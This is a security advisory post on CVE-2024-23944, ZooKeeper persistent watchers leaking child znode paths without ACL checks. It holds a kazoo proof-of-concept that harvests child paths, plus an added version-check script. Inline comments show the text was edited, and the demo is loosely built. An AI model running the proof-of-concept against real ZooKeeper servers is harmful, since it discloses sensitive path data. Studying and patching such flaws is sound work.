A recent vulnerability discovered in Apache ZooKeeper could potentially lead to information disclosure when persistent watchers are not handled properly. The vulnerability, CVE-2024-23944, allows an attacker to monitor child znodes by attaching a persistent watcher to a parent znode which the attacker already has access to. This post will provide a detailed explanation of the vulnerability, how it can be exploited, and recommendations to protect your Apache ZooKeeper servers.

Background

Apache ZooKeeper is an open-source distributed coordination service that is often used for managing configuration information, synchronizing distributed systems, and organizing leadership elections. It provides a hierarchical tree structure (znodes) to store and manage data, and these znodes can be assigned access control lists (ACLs) to control access.

The Vulnerability (CVE-2024-23944)

The vulnerability arises when a persistent watcher (addWatch command) is added by the attacker to a parent znode that they already have access to. When the persistent watcher is triggered, the ZooKeeper server does not perform an ACL check, thus exposing the full path of znodes affected by the watch event to the owner of the watcher.

It's crucial to note that this vulnerability only exposes the path of the znode, not the data stored within it. However, znode paths can contain sensitive information like usernames or login IDs, making this issue potentially critical.

Example Code Snippet

The following sample code uses the kazoo Python client against an unpatched ZooKeeper server to demonstrate the behaviour: a persistent watcher on a parent znode receives the path of a child znode the watcher's principal should not learn about.

import time

from kazoo.client import KazooClient
from kazoo.protocol.states import AddWatchMode
from kazoo.security import make_acl

# Connect to an unpatched ZooKeeper server (host string corrected from the
# garbled '127...1' in the original snippet)
zk = KazooClient(hosts='127.0.0.1:2181')
zk.start()

# Assuming the attacker has access to the parent znode (/parent)
zk.ensure_path('/parent')

def on_event(event):
    # Child znode path is exposed when the watch is triggered: an unpatched
    # server does not ACL-check the watcher's principal against the affected znode
    print(f"Exposed child znode: {event.path}")

# Attacker adds a persistent watcher to the parent znode using kazoo's
# add_watch API (kazoo >= 2.8). The recursive mode is what delivers child
# paths to the watcher, so it is used here in place of the original type='child'.
zk.add_watch('/parent', on_event, AddWatchMode.PERSISTENT_RECURSIVE)

# Creating the child znode with sensitive information in its path; the ACL is
# meant to be one that the watcher's principal does not satisfy
zk.create('/parent/child', acl=[make_acl('ip', '127.0.0.1', all=True)])

time.sleep(1)  # give the NodeCreated event a moment to arrive
zk.stop()

Exploit Details

An attacker could use this vulnerability to gain access to sensitive information contained within znode paths. To exploit this vulnerability, the attacker would need to:

Monitor watch events to gather information about child znodes.

Since ACL checks are not performed when the persistent watcher is triggered, sensitive information in the znodes could potentially be exposed to the attacker, leading to information disclosure.

Mitigation

Apache ZooKeeper has released versions 3.9.2 and 3.8.4 to address this vulnerability. Users are urged to upgrade to these versions immediately to mitigate the issue. The patch ensures that the ACL check is carried out when persistent watchers are triggered, preventing unauthorized disclosure of znode paths.
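As an added example (not part of the original post or of the ZooKeeper project), the following script checks whether a server is still below the fixed versions named above. It reads the server's reply to the srvr four-letter command, which assumes srvr is allowlisted via 4lw.commands.whitelist; the SAMPLE_SRVR reply and its build hash are constructed for offline use.

```python
import re
import socket

# Fixed versions from the advisory: 3.9.2 and 3.8.4. Assumption: branches not
# listed here are treated as fixed only from 3.9.2 upwards.
FIXED = {(3, 9): (3, 9, 2), (3, 8): (3, 8, 4)}

VERSION_RE = re.compile(r"Zookeeper version:\s*(\d+)\.(\d+)\.(\d+)")

# Constructed sample of a 'srvr' reply from an unpatched 3.8.3 server
SAMPLE_SRVR = """Zookeeper version: 3.8.3-0000000000000000000000000000000000000000, built on 2023-10-05 10:34 UTC
Latency min/avg/max: 0/0.0/0
Received: 1
Sent: 0
Connections: 1
Outstanding: 0
Zxid: 0x0
Mode: standalone
Node count: 5
"""


def parse_version(srvr_output):
    """Extract (major, minor, patch) from the 'Zookeeper version:' line."""
    match = VERSION_RE.search(srvr_output)
    if not match:
        raise ValueError("no 'Zookeeper version:' line in srvr output")
    return tuple(int(part) for part in match.groups())


def is_patched(version):
    """True if the version carries the CVE-2024-23944 fix for its branch."""
    fixed = FIXED.get(version[:2])
    if fixed is not None:
        return version >= fixed
    return version >= (3, 9, 2)


def fetch_srvr(host, port=2181, timeout=3.0):
    """Send the 'srvr' four-letter word and return the server's reply text."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"srvr")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")
```

Run against a live server with `is_patched(parse_version(fetch_srvr("zk-host")))`; a False result means the server should be scheduled for upgrade.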

Conclusion

CVE-2024-23944 is a critical vulnerability in Apache ZooKeeper that could lead to information disclosure due to missing ACL checks in persistent watcher handling. It's essential to take this vulnerability seriously and upgrade your ZooKeeper servers to the patched versions (3.9.2 or 3.8.4) as soon as possible to protect your systems and sensitive data.

Timeline

Published on: 03/15/2024 11:15:08 UTC
Last modified on: 05/01/2024 17:15:29 UTC